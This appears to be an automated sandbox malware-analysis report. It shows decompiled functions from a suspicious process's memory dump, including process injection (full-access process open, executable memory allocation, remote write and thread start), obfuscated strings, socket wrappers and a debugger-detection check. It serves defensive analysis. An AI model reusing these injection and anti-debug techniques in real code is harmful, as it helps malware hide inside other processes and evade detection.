                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: NextProcess32
                                                          • String ID:
                                                          • API String ID: 1850201408-0
                                                          • Opcode ID: ce0b27c96ac475c9280fa5255bae305c074b72b8fad56e5601fbc45a0fc0fdf0
                                                          • Instruction ID: 491ff5b1db40d012ad59abe041ee06dba9f8cf6f1abd7662fb82715baaf9d6f5
                                                          • Opcode Fuzzy Hash: ce0b27c96ac475c9280fa5255bae305c074b72b8fad56e5601fbc45a0fc0fdf0
                                                          • Instruction Fuzzy Hash: 8FC08072202220574F1066F53D848C7674DDD4D1F7B041473F509D3111D2594C0051D4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 64%
                                                          			E00456778(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, char _a4, intOrPtr* _a8, char _a12, char _a16) {
                                                          				char _v8;
                                                          				intOrPtr _v12;
                                                          				char _v16;
                                                          				char _v17;
                                                          				char _v24;
                                                          				char _v28;
                                                          				char _v32;
                                                          				char _v36;
                                                          				char _v40;
                                                          				char _v44;
                                                          				char _v48;
                                                          				intOrPtr _v56;
                                                          				intOrPtr _v60;
                                                          				char _v64;
                                                          				short _v84;
                                                          				intOrPtr _v88;
                                                          				char _v132;
                                                          				char _v136;
                                                          				char _v140;
                                                          				char _v144;
                                                          				char _v148;
                                                          				char _v152;
                                                          				char _v156;
                                                          				char _v160;
                                                          				char _v164;
                                                          				char _v168;
                                                          				char _v172;
                                                          				intOrPtr _v176;
                                                          				char _v180;
                                                          				intOrPtr _v184;
                                                          				char _v188;
                                                          				intOrPtr _v192;
                                                          				char _v196;
                                                          				intOrPtr _v200;
                                                          				char _v204;
                                                          				intOrPtr _v208;
                                                          				char _v212;
                                                          				char _v216;
                                                          				char _v220;
                                                          				char _v224;
                                                          				char _v228;
                                                          				char _v232;
                                                          				char _v236;
                                                          				char _v240;
                                                          				void* __ecx;
                                                          				void* _t138;
                                                          				char _t157;
                                                          				char _t201;
                                                          				char _t213;
                                                          				char _t221;
                                                          				char _t229;
                                                          				void* _t251;
                                                          				void* _t271;
                                                          				char _t286;
                                                          				intOrPtr _t288;
                                                          				intOrPtr _t316;
                                                          				void* _t341;
                                                          				void* _t345;
                                                          				void* _t348;
                                                          				intOrPtr _t350;
                                                          				void* _t351;
                                                          				intOrPtr _t353;
                                                          				intOrPtr _t354;
                                                          
                                                          				_t349 = __esi;
                                                          				_t348 = __edi;
                                                          				_t353 = _t354;
                                                          				_t288 = 0x1d;
                                                          				do {
                                                          					_push(0);
                                                          					_push(0);
                                                          					_t288 = _t288 - 1;
                                                          				} while (_t288 != 0);
                                                          				_t1 =  &_v8;
                                                          				 *_t1 = _t288;
                                                          				_push(__ebx);
                                                          				_push(__esi);
                                                          				_push(__edi);
                                                          				_v16 =  *_t1;
                                                          				_v12 = __edx;
                                                          				_v8 = __eax;
                                                          				_t286 = _a16;
                                                          				E004049CC(_v8);
                                                          				E004049CC(_v12);
                                                          				E004049CC(_v16);
                                                          				_push(_t353);
                                                          				_push(0x456d02);
                                                          				_push( *[fs:eax]);
                                                          				 *[fs:eax] = _t354;
                                                          				_v17 = 0;
                                                          				E00404A3C(_v16, 2, 1,  &_v136);
                                                          				_push(_v136);
                                                          				L00455C58(0x456d20,  &_v140);
                                                          				_pop(_t138);
                                                          				E00404928(_t138, _v140);
                                                          				if(0 == 0) {
                                                          					L00455238(8, _t286, 2,  &_v44, __esi);
                                                          					L00453BE8(_v16,  &_v48, _v44);
                                                          					_push(_v44);
                                                          					_push(_v48);
                                                          					_push( *((intOrPtr*)( *0x46eeac)));
                                                          					E0040489C();
                                                          					L00455C58("xmvhF0WXhG",  &_v148);
                                                          					__eflags = E0045C584(_v148, _t286);
                                                          					if(__eflags == 0) {
                                                          						L00455C58("xmvhF0WXhG",  &_v152);
                                                          						L0045BCF8(_v152, _t286,  &_v152, __eflags);
                                                          					}
                                                          					L00455C58("xmvhF0WXhNKD",  &_v156);
                                                          					E0045C058(_v156, _t286, _v48, _t348, _t349);
                                                          					_t315 =  &_v160;
                                                          					L00455C58("xmvhF0WXhNKD",  &_v160);
                                                          					_t157 = E0045BF6C(_v160, _t286, _t349);
                                                          					__eflags = _t157;
                                                          					if(_t157 == 0) {
                                                          						goto L45;
                                                          					}
                                                          					__eflags = _t286;
                                                          					if(_t286 == 0) {
                                                          						__eflags = _a4;
                                                          						if(_a4 == 0) {
                                                          							L00449BE4(E00404A34( &_v16), _t286, _a12, _t348, _t349, _a8, 0);
                                                          							goto L45;
                                                          						}
                                                          						_t350 = E0045AA10(0x1f0fff, _t286,  *_a8, 0, _t349);
                                                          						L24:
                                                          						_v28 = E004560F0(_t286, _t348, _t350, __eflags, _t350, 0, 0x85e, 0x1000, 0x40);
                                                          						__eflags = _v28;
                                                          						if(__eflags == 0) {
                                                          							__eflags = 0;
                                                          							_v28 = E0045C79C(_t350, _t286, 0x85e, 0, _t348, _t350, 0x40, 0x1000);
                                                          						}
                                                          						E004561CC(_t286, _t348, _t350, __eflags, _t350, _v28, 0x46e47d, 0x85e,  &_v32);
                                                          						__eflags = _v32 - 0x85c;
                                                          						if(_v32 < 0x85c) {
                                                          							L0045BA78(_t350, _t286, 0x46e47d, _v28, _t350,  &_v32, 0x85e);
                                                          						}
                                                          						__eflags = _t286;
                                                          						if(_t286 == 0) {
                                                          							L40:
                                                          							__eflags = 0;
                                                          							_t348 = E0045CB08(_t350, _t286, 0, 0, _t350,  &_v40, 0, 0, _v28);
                                                          							goto L41;
                                                          						} else {
                                                          							L00455C58("xq4uRaWkp7",  &_v168);
                                                          							E00404928(_v8, _v168);
                                                          							if(__eflags != 0) {
                                                          								goto L40;
                                                          							}
                                                          							_v216 = _v24;
                                                          							_v212 = 0;
                                                          							_v208 = _v28;
                                                          							_v204 = 5;
                                                          							_v200 = 0;
                                                          							_v196 = 5;
                                                          							_v192 = 0;
                                                          							_v188 = 5;
                                                          							_v184 = 0;
                                                          							_v180 = 5;
                                                          							_v176 = 0;
                                                          							_v172 = 5;
                                                          							L00455C58("cEZZFHW4pjNUx4Z3haWDpG",  &_v220);
                                                          							_t201 = E004560E8(E0045908C(_t286, _t348, _t350, _v220,  &_v216, 5));
                                                          							__eflags = _t201;
                                                          							if(_t201 == 0) {
                                                          								L36:
                                                          								_t348 = E0045CB08(_t350, _t286, 0, 0, _t350,  &_v40, 0, 0, _v28);
                                                          								__eflags = _a12;
                                                          								if(__eflags == 0) {
                                                          									L41:
                                                          									E0045AFA4(_t350, _t286);
                                                          									__eflags = _t286;
                                                          									if(_t286 != 0) {
                                                          										 *_a8 = _v56;
                                                          									}
                                                          									E0045ACDC(_t348, _t286,  &_v36, _t350);
                                                          									__eflags = _v36 - 0x103;
                                                          									if(_v36 == 0x103) {
                                                          										_v17 = 1;
                                                          									}
                                                          									goto L45;
                                                          								}
                                                          								E0045A4DC(0x320);
                                                          								L00455C58("+5Wep51",  &_v240);
                                                          								E0045A598(_v240, _t286,  &_v236, _t348, _t350, __eflags);
                                                          								_t213 = E004049DC(_v236);
                                                          								_push(_t213);
                                                          								_push(0);
                                                          								_push(0x1f0001);
                                                          								L00406C40();
                                                          								__eflags = _t213;
                                                          								if(__eflags != 0) {
                                                          									E0045A5E4(_t286, _t348, _t350, __eflags);
                                                          									goto L41;
                                                          								}
                                                          								E0045AFA4(_t213, _t286);
                                                          								goto L45;
                                                          							}
                                                          							L00455C58("cEZjp58e7HK6hE7",  &_v224);
                                                          							_t221 = E004560E8(E0045908C(_t286, _t348, _t350, _v224,  &_v220, 0xffffffff));
                                                          							__eflags = _t221;
                                                          							if(_t221 == 0) {
                                                          								goto L36;
                                                          							}
                                                          							__eflags = _a12;
                                                          							if(__eflags == 0) {
                                                          								goto L41;
                                                          							}
                                                          							E0045A4DC(0x320);
                                                          							L00455C58("+5Wep51",  &_v232);
                                                          							E0045A598(_v232, _t286,  &_v228, _t348, _t350, __eflags);
                                                          							_t229 = E004049DC(_v228);
                                                          							_push(_t229);
                                                          							_push(0);
                                                          							_push(0x1f0001);
                                                          							L00406C40();
                                                          							__eflags = _t229;
                                                          							if(__eflags != 0) {
                                                          								E0045A5E4(_t286, _t348, _t350, __eflags);
                                                          								goto L41;
                                                          							}
                                                          							E0045AFA4(_t229, _t286);
                                                          							goto L36;
                                                          						}
                                                          					}
                                                          					__eflags = _v8;
                                                          					if(_v8 == 0) {
                                                          						_t315 =  &_v8;
                                                          						L00455C58("xq4uRaWkp7",  &_v8);
                                                          					}
                                                          					__eflags =  *((char*)( *0x46efcc));
                                                          					if(__eflags != 0) {
                                                          						L00457B18( &_v8, _t286, _t315, _t349, __eflags);
                                                          					}
                                                          					L0040708C();
                                                          					L0040708C();
                                                          					_v132 = 0x44;
                                                          					_v84 = 0;
                                                          					_v88 = 1;
                                                          					L00455C58("xq4uRaWkp7",  &_v164);
                                                          					E00404928(_v8, _v164);
                                                          					if(__eflags != 0) {
                                                          						_t351 = 4;
                                                          					} else {
                                                          						_t351 = 0;
                                                          					}
                                                          					__eflags = _v12;
                                                          					if(_v12 != 0) {
                                                          						_push(0);
                                                          						_push(0);
                                                          						_push(_t351);
                                                          						_push(0);
                                                          						_push(0);
                                                          						_push( &_v132);
                                                          						_push( &_v64);
                                                          						_push(E004049DC(_v12));
                                                          						_t251 = E004049DC(_v8);
                                                          						__eflags = 0;
                                                          						_pop(_t341);
                                                          						E0045C634(_t251, _t286, 0, _t341, _t348, _t351);
                                                          					} else {
                                                          						__eflags = E0045C634(0, _t286, 0, E004049DC(_v8), _t348, _t351,  &_v64,  &_v132, 0, 0, _t351, 0, 0);
                                                          						if(__eflags == 0) {
                                                          							__eflags = E0045C634(E004049DC(_v8), _t286, 0, 0, _t348, _t351,  &_v64,  &_v132, 0, 0, _t351, 0, 0);
                                                          							if(__eflags == 0) {
                                                          								_push(0);
                                                          								_push(0);
                                                          								_push(_t351);
                                                          								_push(0);
                                                          								_push(0);
                                                          								_push( &_v132);
                                                          								_push( &_v64);
                                                          								_push(E004049DC(_v8));
                                                          								_t271 = E004049DC(_v8);
                                                          								_pop(_t345);
                                                          								E0045C634(_t271, _t286, 0, _t345, _t348, _t351);
                                                          							}
                                                          						}
                                                          					}
                                                          					 *_a8 = _v56;
                                                          					_v24 = _v60;
                                                          					_t350 = _v64;
                                                          					goto L24;
                                                          				} else {
                                                          					L00455C58("xqSlhEWUF0WuCPY6",  &_v144);
                                                          					E00454A48(_v144, _t286);
                                                          					L45:
                                                          					_pop(_t316);
                                                          					 *[fs:eax] = _t316;
                                                          					_push(0x456d09);
                                                          					E00404524( &_v240, 6);
                                                          					E00404524( &_v168, 9);
                                                          					E00404524( &_v48, 2);
                                                          					return E00404524( &_v16, 3);
                                                          				}
			}
                                                          0x00456c99
                                                          0x00456ca1
                                                          0x00456ca1
                                                          0x00456ca8
                                                          0x00456cad
                                                          0x00456cb4
                                                          0x00456cb6
                                                          0x00456cb6
                                                          0x00000000
                                                          0x00456cb4
                                                          0x00456c27
                                                          0x00456c37
                                                          0x00456c48
                                                          0x00456c53
                                                          0x00456c58
                                                          0x00456c59
                                                          0x00456c5b
                                                          0x00456c60
                                                          0x00456c65
                                                          0x00456c67
                                                          0x00456c70
                                                          0x00000000
                                                          0x00456c70
                                                          0x00456c69
                                                          0x00000000
                                                          0x00456c69
                                                          0x00456b87
                                                          0x00456b98
                                                          0x00456b9d
                                                          0x00456b9f
                                                          0x00000000
                                                          0x00000000
                                                          0x00456ba1
                                                          0x00456ba5
                                                          0x00000000
                                                          0x00000000
                                                          0x00456bb0
                                                          0x00456bc0
                                                          0x00456bd1
                                                          0x00456bdc
                                                          0x00456be1
                                                          0x00456be2
                                                          0x00456be4
                                                          0x00456be9
                                                          0x00456bee
                                                          0x00456bf0
                                                          0x00456bf9
                                                          0x00000000
                                                          0x00456bf9
                                                          0x00456bf2
                                                          0x00000000
                                                          0x00456bf2
                                                          0x00456abb
                                                          0x004568da
                                                          0x004568de
                                                          0x004568e0
                                                          0x004568e8
                                                          0x004568e8
                                                          0x004568f2
                                                          0x004568f5
                                                          0x004568fa
                                                          0x004568fa
                                                          0x00456907
                                                          0x00456914
                                                          0x00456919
                                                          0x00456920
                                                          0x00456926
                                                          0x00456938
                                                          0x00456946
                                                          0x0045694b
                                                          0x00456951
                                                          0x0045694d
                                                          0x0045694d
                                                          0x0045694d
                                                          0x00456956
                                                          0x0045695a
                                                          0x004569d6
                                                          0x004569d8
                                                          0x004569da
                                                          0x004569db
                                                          0x004569dd
                                                          0x004569e2
                                                          0x004569e6
                                                          0x004569ef
                                                          0x004569f3
                                                          0x004569f8
                                                          0x004569fa
                                                          0x004569fb
                                                          0x0045695c
                                                          0x00456980
                                                          0x00456982
                                                          0x004569a6
                                                          0x004569a8
                                                          0x004569aa
                                                          0x004569ac
                                                          0x004569ae
                                                          0x004569af
                                                          0x004569b1
                                                          0x004569b6
                                                          0x004569ba
                                                          0x004569c3
                                                          0x004569c7
                                                          0x004569ce
                                                          0x004569cf
                                                          0x004569cf
                                                          0x004569a8
                                                          0x00456982
                                                          0x00456a06
                                                          0x00456a0b
                                                          0x00456a0e
                                                          0x00000000
                                                          0x00456802
                                                          0x0045680d
                                                          0x00456818
                                                          0x00456cba
                                                          0x00456cbc
                                                          0x00456cbf
                                                          0x00456cc2
                                                          0x00456cd2
                                                          0x00456ce2
                                                          0x00456cef
                                                          0x00456d01
                                                          0x00456d01

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: AttributesChangeCloseFileFindNotification
                                                          • String ID: +5Wep51$D$cEZZFHW4pjNUx4Z3haWDpG$cEZjp58e7HK6hE7$cW3$xmvhF0WXhG$xmvhF0WXhNKD$xq4uRaWkp7$xqSlhEWUF0WuCPY6$}F
                                                          • API String ID: 1165628546-3118009159
                                                          • Opcode ID: 618e7471a2e185a4527667531e7119b5efd4ad20bfd98087ab51d461139cd03c
                                                          • Instruction ID: a3dbc95727ec73f69a895294a9803b31fee963c2aff3f94a1830a1f4a7f269ab
                                                          • Opcode Fuzzy Hash: 618e7471a2e185a4527667531e7119b5efd4ad20bfd98087ab51d461139cd03c
                                                          • Instruction Fuzzy Hash: 06E1A770A002089FDB11EBA5CC41BDEB7B5EF45305F5081ABF908B7283DB786E498B59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 85%
                                                          			E0045652C(char __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, char _a4) {
                                                          				char _v8;
                                                          				char _v12;
                                                          				intOrPtr _v20;
                                                          				char _v24;
                                                          				char _v28;
                                                          				char _v44;
                                                          				short _v64;
                                                          				intOrPtr _v68;
                                                          				char _v112;
                                                          				char _v116;
                                                          				intOrPtr _v176;
                                                          				void* _t66;
                                                          				void* _t72;
                                                          				char _t74;
                                                          				void* _t81;
                                                          				void* _t89;
                                                          				void* _t103;
                                                          				void* _t105;
                                                          				void* _t113;
                                                          				void* _t115;
                                                          				void* _t125;
                                                          				void* _t140;
                                                          				intOrPtr _t141;
                                                          				void* _t153;
                                                          				void* _t157;
                                                          				intOrPtr* _t158;
                                                          				char _t160;
                                                          
                                                          				_t154 = __esi;
                                                          				_t153 = __edi;
                                                          				_t158 = _t157 + 0xffffff90;
                                                          				_push(__ebx);
                                                          				_v116 = 0;
                                                          				_v12 = __edx;
                                                          				_v8 = __eax;
                                                          				E004049CC(_v8);
                                                          				E004049CC(_v12);
                                                          				_push(_t157);
                                                          				_push(0x456751);
                                                          				_push( *[fs:eax]);
                                                          				 *[fs:eax] = _t158;
                                                          				if(_a4 == 0) {
                                                          					_t140 = 0;
                                                          					_t125 = E0045AA10(0x1f0fff, __ecx, __ecx, 0, __esi);
                                                          					__eflags = _t125;
                                                          					if(_t125 == 0) {
                                                          						L18:
                                                          						_pop(_t141);
                                                          						 *[fs:eax] = _t141;
                                                          						_push(0x456758);
                                                          						E00404500( &_v116);
                                                          						return E00404524( &_v12, 2);
                                                          					}
                                                          					L10:
                                                          					_v20 = E004560F0(_t125, _t153, _t154, _t161, _t125, 0, E004047DC(_v12), 0x1000, 0x40);
                                                          					if(_v20 == 0) {
                                                          						_t89 = E004047DC(_v12);
                                                          						_t140 = 0;
                                                          						_v20 = E0045C79C(_t125, _t125, _t89, 0, _t153, _t154, 0x40, 0x1000);
                                                          					}
                                                          					_t66 = E004047DC(_v12);
                                                          					E004561CC(_t125, _t153, _t154, 0, _t125, _v20, E00404A34( &_v12), _t66,  &_v24);
                                                          					_t72 = E004047DC(_v12);
                                                          					asm("cdq");
                                                          					_push(_t140);
                                                          					_push(_t72 - 2);
                                                          					_t74 = _v24;
                                                          					if(0 != _v176) {
                                                          						if(__eflags >= 0) {
                                                          							goto L17;
                                                          						}
                                                          						goto L16;
                                                          					} else {
                                                          						if(_t74 >=  *_t158) {
                                                          							L17:
                                                          							E0045CB08(_t125, _t125, 0, 0, _t154,  &_v28, 0, 0, _v20);
                                                          							goto L18;
                                                          						}
                                                          						L16:
                                                          						_t81 = E004047DC(_v12);
                                                          						L0045BA78(_t125, _t125, E00404A34( &_v12), _v20, _t154,  &_v24, _t81);
                                                          						goto L17;
                                                          					}
                                                          				}
                                                          				_t160 = _v8;
                                                          				if(_t160 == 0) {
                                                          					L00455C58("xq4uRaWkp7",  &_v8);
                                                          				}
                                                          				L0040708C();
                                                          				L0040708C();
                                                          				_v112 = 0x44;
                                                          				_v64 = 0;
                                                          				_v68 = 1;
                                                          				L00455C58("xq4uRaWkp7",  &_v116);
                                                          				E00404928(_v8, _v116);
                                                          				if(_t160 != 0) {
                                                          					_t103 = E004049DC(_v8);
                                                          					_t126 = _t103;
                                                          					_t140 = _t103;
                                                          					_t105 = E0045C634(0, _t103, 0, _t140, _t153, _t154,  &_v44,  &_v112, 0, 0, 4, 0, 0);
                                                          					__eflags = _t105;
                                                          					if(_t105 == 0) {
                                                          						_t140 = 0;
                                                          						__eflags = 0;
                                                          						E0045C634(_t126, _t126, 0, 0, _t153, _t154,  &_v44,  &_v112, 0, 0, 4, 0, 0);
                                                          					}
                                                          				} else {
                                                          					_t113 = E004049DC(_v8);
                                                          					_t127 = _t113;
                                                          					_t140 = _t113;
                                                          					_t115 = E0045C634(0, _t113, 0, _t140, _t153, _t154,  &_v44,  &_v112, 0, 0, 0, 0, 0);
                                                          					_t161 = _t115;
                                                          					if(_t115 == 0) {
                                                          						_t140 = 0;
                                                          						E0045C634(_t127, _t127, 0, 0, _t153, _t154,  &_v44,  &_v112, 0, 0, 0, 0, 0);
                                                          					}
                                                          				}
                                                          				_t125 = _v44;
                                                          				goto L10;
                                                          			}

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: D$xq4uRaWkp7
                                                          • API String ID: 0-2745843302
                                                          • Opcode ID: 21108f33afe8ef012c0de6844adb947f79e71d12a2158b0643d7ff9832ae7faf
                                                          • Instruction ID: 534022d9d4038136160a0f900c4bbd816f907923284b4ddf965a856d67b7d687
                                                          • Opcode Fuzzy Hash: 21108f33afe8ef012c0de6844adb947f79e71d12a2158b0643d7ff9832ae7faf
                                                          • Instruction Fuzzy Hash: 45513671B04208AFDB14EAA5CC82BDFB7B9AB48305F51443BF605F7182DB7899098B5C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 37%
                                                          			E00428120(void* __eax, void* __edx) {
                                                          				void* _t7;
                                                          
                                                          				_t7 = __eax;
                                                          				return  *0x46af9c(_t7, __edx, E004280E4(__edx));
                                                          			}

                                                          APIs
                                                          • bind.WS2_32(000000FF,?,00000000), ref: 00428130
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: bind
                                                          • String ID:
                                                          • API String ID: 1187836755-0
                                                          • Opcode ID: ecb19e219236b03f66d4c91561c28552d8394996d8899dee8b06f22479885405
                                                          • Instruction ID: be93944b6830399a07b6e7c929bb2f6d8e77dfa8a2d384a963574ad39b9a0a9c
                                                          • Opcode Fuzzy Hash: ecb19e219236b03f66d4c91561c28552d8394996d8899dee8b06f22479885405
                                                          • Instruction Fuzzy Hash: 04C09BE1312D346F5255666D2CC4CEB518CCD4D19D3058077F505D2112D7544C1546B6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: recv
                                                          • String ID:
                                                          • API String ID: 1507349165-0
                                                          • Opcode ID: 21f6edef8d7ed5a6d2079a86e8eec99937be0fb3d74abcfd933d254879f9adc0
                                                          • Instruction ID: 821f3582d7042118d624f2b1c45a1d930ebea4d6f374e9624a8f3d9229fe3e04
                                                          • Opcode Fuzzy Hash: 21f6edef8d7ed5a6d2079a86e8eec99937be0fb3d74abcfd933d254879f9adc0
                                                          • Instruction Fuzzy Hash: 33C09BF210430C7F65045795EDC9C77B75CE65C6557404115F6044210195756C104576
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			/* Adler-32 checksum (zlib adler32): __eax = running checksum (s1 low 16 bits, s2 high 16 bits),
                                                          			   __edx = buffer, __ecx = length. 0xfff1 is the modulus 65521 and 0x15b0 is zlib's NMAX (5552),
                                                          			   the largest block that can be summed before a reduction mod 65521 is required. */
                                                          			E004222B4(signed int __eax, void* __ecx, void* __edx) {
                                                          				void* _t69;
                                                          				signed int _t86;
                                                          				signed int _t87;
                                                          				signed int _t88;
                                                          				signed int _t89;
                                                          				signed int _t90;
                                                          				signed int _t91;
                                                          				signed int _t92;
                                                          				signed int _t93;
                                                          				signed int _t94;
                                                          				signed int _t95;
                                                          				signed int _t96;
                                                          				signed int _t97;
                                                          				signed int _t98;
                                                          				signed int _t99;
                                                          				signed int _t100;
                                                          				signed int _t101;
                                                          				signed int _t102;
                                                          				signed int _t103;
                                                          				signed int _t104;
                                                          				signed int _t105;
                                                          				signed int _t106;
                                                          				signed int _t107;
                                                          				signed int _t108;
                                                          				signed int _t109;
                                                          				signed int _t110;
                                                          				signed int _t111;
                                                          				signed int _t112;
                                                          				signed int _t113;
                                                          				signed int _t114;
                                                          				signed int _t115;
                                                          				signed int _t116;
                                                          				signed int _t117;
                                                          				void* _t119;
                                                          				void* _t150;
                                                          				signed int _t195;
                                                          				signed int _t227;
                                                          				void* _t229;
                                                          
                                                          				_t229 = __ecx;
                                                          				_t195 = __eax >> 0x00000010 & 0x0000ffff;
                                                          				_t86 = __eax & 0x0000ffff;
                                                          				_t228 = __edx;
                                                          				if(__ecx != 1) {
                                                          					if(__edx != 0) {
                                                          						if(__ecx >= 0x10) {
                                                          							if(__ecx < 0x15b0) {
                                                          								L19:
                                                          								if(_t229 == 0) {
                                                          									L26:
                                                          									return _t195 << 0x00000010 | _t86;
                                                          								}
                                                          								if(_t229 < 0x10) {
                                                          									while(1) {
                                                          										L24:
                                                          										_t119 = _t229;
                                                          										_t229 = _t229 + 0xffffffff;
                                                          										if(_t119 == 0) {
                                                          											break;
                                                          										}
                                                          										_t86 = _t86;
                                                          										_t228 = _t228 + 1;
                                                          										_t195 = _t195 + _t86;
                                                          									}
                                                          									_t86 = _t86 % 0xfff1;
                                                          									_t195 = _t195 % 0xfff1;
                                                          									goto L26;
                                                          								} else {
                                                          									goto L21;
                                                          								}
                                                          								do {
                                                          									L21:
                                                          									_t229 = _t229 - 0x10;
                                                          									_t87 = _t86;
                                                          									_t88 = _t87;
                                                          									_t89 = _t88;
                                                          									_t90 = _t89;
                                                          									_t91 = _t90;
                                                          									_t92 = _t91;
                                                          									_t93 = _t92;
                                                          									_t94 = _t93;
                                                          									_t95 = _t94;
                                                          									_t96 = _t95;
                                                          									_t97 = _t96;
                                                          									_t98 = _t97;
                                                          									_t99 = _t98;
                                                          									_t100 = _t99;
                                                          									_t101 = _t100;
                                                          									_t86 = _t101;
                                                          									_t195 = _t195 + _t87 + _t88 + _t89 + _t90 + _t91 + _t92 + _t93 + _t94 + _t95 + _t96 + _t97 + _t98 + _t99 + _t100 + _t101 + _t86;
                                                          									_t228 = _t228 + 0x10;
                                                          								} while (_t229 >= 0x10);
                                                          								goto L24;
                                                          							} else {
                                                          								goto L16;
                                                          							}
                                                          							do {
                                                          								L16:
                                                          								_t229 = _t229 - 0x15b0;
                                                          								_t69 = 0x15b;
                                                          								do {
                                                          									_t102 = _t86;
                                                          									_t103 = _t102;
                                                          									_t104 = _t103;
                                                          									_t105 = _t104;
                                                          									_t106 = _t105;
                                                          									_t107 = _t106;
                                                          									_t108 = _t107;
                                                          									_t109 = _t108;
                                                          									_t110 = _t109;
                                                          									_t111 = _t110;
                                                          									_t112 = _t111;
                                                          									_t113 = _t112;
                                                          									_t114 = _t113;
                                                          									_t115 = _t114;
                                                          									_t116 = _t115;
                                                          									_t86 = _t116;
                                                          									_t195 = _t195 + _t102 + _t103 + _t104 + _t105 + _t106 + _t107 + _t108 + _t109 + _t110 + _t111 + _t112 + _t113 + _t114 + _t115 + _t116 + _t86;
                                                          									_t228 = _t228 + 0x10;
                                                          									_t69 = _t69 - 1;
                                                          								} while (_t69 != 0);
                                                          								_t86 = _t86 % 0xfff1;
                                                          								_t195 = _t195 % 0xfff1;
                                                          							} while (_t229 >= 0x15b0);
                                                          							goto L19;
                                                          						}
                                                          						while(1) {
                                                          							_t150 = _t229;
                                                          							_t229 = _t229 + 0xffffffff;
                                                          							if(_t150 == 0) {
                                                          								break;
                                                          							}
                                                          							_t86 = _t86;
                                                          							_t228 = _t228 + 1;
                                                          							_t195 = _t195 + _t86;
                                                          						}
                                                          						if(_t86 >= 0xfff1) {
                                                          							_t86 = _t86 - 0xfff1;
                                                          						}
                                                          						return _t195 % 0x0000fff1 << 0x00000010 | _t86;
                                                          					}
                                                          					return 1;
                                                          				}
                                                          				_t117 = _t86;
                                                          				if(_t117 >= 0xfff1) {
                                                          					_t117 = _t117 - 0xfff1;
                                                          				}
                                                          				_t227 = _t195 + _t117;
                                                          				if(_t227 >= 0xfff1) {
                                                          					_t227 = _t227 - 0xfff1;
                                                          				}
                                                          				return _t227 << 0x00000010 | _t117;
                                                          			}

                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a46a25728c0e4dbe5aa0a1433bd48846487817f0c63754d6310f19dcd07371b1
                                                          • Instruction ID: 023084f342c357e0e18156b2f3c73eb7ccc665e74a617334b23cb43cdabd31f7
                                                          • Opcode Fuzzy Hash: a46a25728c0e4dbe5aa0a1433bd48846487817f0c63754d6310f19dcd07371b1
                                                          • Instruction Fuzzy Hash: 5B61752238D69103E33D8E7D6DE02B7DAD35FC631862ED57E94DAC3F42E89EA4165108
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			/* Anti-debug check: fs:[0x30] is the PEB pointer; the byte at PEB+2 is BeingDebugged.
                                                          			   Returns 1 when a debugger is attached, else 0. */
                                                          			E00450514(void* __eax) {
                                                          				intOrPtr* _v8;
                                                          				char _v9;
                                                          				short _v11;
                                                          				intOrPtr* _t10;
                                                          				void* _t11;
                                                          
                                                          				_v8 =  *[fs:0x30];
                                                          				_t10 = _v8;
                                                          				_v11 =  *_t10;
                                                          				_v9 =  *((intOrPtr*)(_t10 + 2));
                                                          				if(_v9 == 0) {
                                                          					_t11 = 0;
                                                          				} else {
                                                          					_t11 = 1;
                                                          				}
                                                          				return _t11;
                                                          			}

                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 24687ab9ed464844eb98739ef85586ee6949eaf5617852ffb069b09ba51bb684
                                                          • Instruction ID: fa87b1b6a6b906522428d95d4908b8c07fd2c03dee743528d612246b6c7ed201
                                                          • Opcode Fuzzy Hash: 24687ab9ed464844eb98739ef85586ee6949eaf5617852ffb069b09ba51bb684
                                                          • Instruction Fuzzy Hash: FFE0863981C688ADD701CBA89442ADAB7F99F19310F2540E6C858D3392F5765604D70A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
